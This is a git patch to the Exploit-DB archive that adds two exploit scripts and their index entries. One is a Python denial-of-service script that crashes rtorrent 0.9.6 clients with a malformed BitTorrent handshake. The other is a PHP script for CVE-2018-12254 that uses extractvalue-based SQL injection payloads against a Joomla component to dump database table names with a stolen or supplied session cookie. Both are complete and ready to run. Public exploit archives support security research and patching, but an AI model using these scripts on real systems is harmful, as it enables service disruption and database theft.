From 1ccdc79fbda6fe81207c5ce7fbe0c87d8ceeeb44 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 15 Jun 2018 05:01:44 +0000
Subject: [PATCH] DB: 2018-06-15

2 changes to exploits/shellcodes

rtorrent 0.9.6 - Denial of Service

Joomla Component Ek rishta 2.10 - SQL Injection
---
 exploits/linux/dos/44894.py    | 40 +++++++++++++++++++++++++
 exploits/php/webapps/44893.php | 54 ++++++++++++++++++++++++++++++++++
 files_exploits.csv             |  2 ++
 3 files changed, 96 insertions(+)
 create mode 100755 exploits/linux/dos/44894.py
 create mode 100644 exploits/php/webapps/44893.php

diff --git a/exploits/linux/dos/44894.py b/exploits/linux/dos/44894.py
new file mode 100755
index 000000000..8f29fe04d
--- /dev/null
+++ b/exploits/linux/dos/44894.py
@@ -0,0 +1,40 @@
+# Exploit Title: rtorrent 0.9.6 - Denial of Service
+# Date: 2018-01-10
+# Exploit Author: ecx86
+# Vendor Homepage: http://rtorrent.net
+# Software Link: https://github.com/rakshasa/rtorrent/releases
+# Version: <= 0.9.6
+# Tested on: Debian GNU/Linux 9.4 (stretch)
+
+# This crash is due to a bad bencode parse of the handshake data map.
+# Specifically, by providing a massive length for a string, namely the key of a map entry,
+# malloc fails, returning 0, which is passed to a memcpy call that causes the segfault.
+# This can be triggered actively by sending the crash-triggering data to a seeding rtorrent
+# client, or when a downloading rtorrent client connects to a malicious peer.
+
+#!/usr/bin/env python
+import socket
+import struct
+
+crash = ''
+proto_name = 'BitTorrent protocol'
+crash += chr(len(proto_name)) + proto_name # magic
+crash += '00000000' # reserved extension bytes
+
+# sha1 hash of info dictionary
+# change this depending on your torrent
+crash += '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
+
+crash += '00000000000000000000' # peer id
+
+msg = ''
+msg += struct.pack('<H', 20) # message type: extended
+msg += 'd99999999999999999999999999999999:' # payload
+
+crash += struct.pack('>I', len(msg))
+crash += msg
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(('1.3.3.7', 6890))
+s.send(crash)
+s.close()
\ No newline at end of file
diff --git a/exploits/php/webapps/44893.php b/exploits/php/webapps/44893.php
new file mode 100644
index 000000000..d8876fe9c
--- /dev/null
+++ b/exploits/php/webapps/44893.php
@@ -0,0 +1,54 @@
+# Title: SQL Injection Joomla Component Ek rishta 2.10 - SQL Injection
+# Date: 2018-06-14
+# Exploit Author: Guilherme Assmann
+# Vendor Homepage:https://www.joomla.org/
+# Version: 2.10
+# Tested on: MacOSX, Safari, Chrome
+# Download: https://extensions.joomla.org/extension/ek-rishta/
+# CVE: CVE-2018-12254
+
+# Vulnerability Description
+# To exploit this vulnerability, the user must be logged on to the platform!
+# the vulnerability allows SQL Injection via the
+# PATH_INFO to a home/requested_user/Sent%20interest/[username] URI.
+# more information(en): 
+# https://fireshellsecurity.team/cve-2018-12254-sql-injection-joomla-component/
+# more information(pt-br): https://m4k4br0.github.io/sql-injection-joomla-component/
+# more information: https://desecsecurity.com/
+# exploit code to dump tables:
+
+<?php
+
+// CVE-2018-12254
+
+// after dump the tables, use %60%23table_name%60 to dump columns...
+
+$host = $argv[1];
+$cookie = $argv[2];
+
+// Usage: php exploit.php [http://[HOST]/](http://[host]/) “Cookie: foo=bar”
+function exploit($host,$ck){
+$urls = sqli();
+$ch = curl_init();
+foreach($urls as $url){
+curl_setopt($ch,CURLOPT_URL,$host.$url);
+curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
+curl_setopt($ch,CURLOPT_USERAGENT,":)");
+curl_setopt($ch,CURLOPT_HTTPHEADER, [$ck]);
+curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,100);
+curl_setopt($ch,CURLOPT_TIMEOUT,100);
+$response = curl_exec($ch);
+$s =  strpos($response,"#__");
+echo substr($response,$s,30)."\n";
+}
+}
+function sqli(){
+$uri = "/index.php/home/requested_user/Sent%20interest/1'or%20";
+for($i=0;$i<100;$i++){
+$value = $i+1;
+$data[$i] = $uri.str_replace("+","%20",urlencode('extractvalue(0xa,concat(0xa,(select table_name from information_schema.tables where table_schema=database() limit '.$value.',1))) #'));
+}
+return $data;
+}
+exploit($host,$cookie);
+?>
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index c72dd1eb3..555276b74 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5998,6 +5998,7 @@ id,file,description,date,author,type,platform,port
 44861,exploits/multiple/dos/44861.html,"WebKit - Use-After-Free when Resuming Generator",2018-06-08,"Google Security Research",dos,multiple,
 44862,exploits/multiple/dos/44862.txt,"WebRTC - VP9 Frame Processing  Out-of-Bounds Memory Access",2018-06-08,"Google Security Research",dos,multiple,
 44863,exploits/multiple/dos/44863.txt,"WebRTC - VP9 Missing Frame Processing Out-of-Bounds Memory Access",2018-06-08,"Google Security Research",dos,multiple,
+44894,exploits/linux/dos/44894.py,"rtorrent 0.9.6 - Denial of Service",2018-06-14,ecx86,dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -39552,3 +39553,4 @@ id,file,description,date,author,type,platform,port
 44886,exploits/hardware/webapps/44886.txt,"Canon LBP6030w - Authentication Bypass",2018-06-12,"Huy Kha",webapps,hardware,
 44887,exploits/php/webapps/44887.html,"MACCMS 10 - Cross-Site Request Forgery (Add User)",2018-06-13,bay0net,webapps,php,
 44891,exploits/php/webapps/44891.txt,"Redaxo CMS Mediapool Addon < 5.5.1 - Arbitrary File Upload",2018-06-13,h0n1gsp3cht,webapps,php,
+44893,exploits/php/webapps/44893.php,"Joomla Component Ek rishta 2.10 - SQL Injection",2018-06-14,"Guilherme Assmann",webapps,php,